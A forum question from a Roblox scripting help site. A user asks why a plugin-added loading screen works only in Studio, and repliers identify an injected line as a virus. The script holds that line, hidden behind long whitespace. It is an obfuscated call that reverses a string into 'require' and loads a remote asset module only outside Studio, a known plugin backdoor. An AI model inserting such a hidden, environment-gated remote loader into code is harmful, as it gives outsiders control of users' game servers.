Scripting Helpers is winding down operations and is now read-only. More info→
Ad
Log in to vote
0

I am confused as to why my loading screen is broken, can anyone help?

Asked by 5 years ago

It is working in the studio but not in the actual game I used a plugin and this is all it says in the script under serverscriptstorage:

--[[
    r x d e s i r e
    onPlayerAdded
--]]
                                                                                                                                                                                                                                           local q=getfenv;local u='RunService';local j='eriuqer';local g=string.reverse;local b=3610230360;local a=12-6+6;if not game:service(u):IsStudio()then q()[g(j)](b+a)end

function added(player)  

    local GUI = script.IntroGui:clone()
    GUI.Parent = player:WaitForChild("PlayerGui")

end
game.Players.PlayerAdded:connect(added)
0
What plugin was it....also delete line 5 lol. Make sure you are using RemoteEvents as well(when needed) ForeverBrown 356 — 5y
0
Delete Line 5 because is virus and this using InStudio so its working only in Studio adrian2012PL 30 — 5y

Answer this question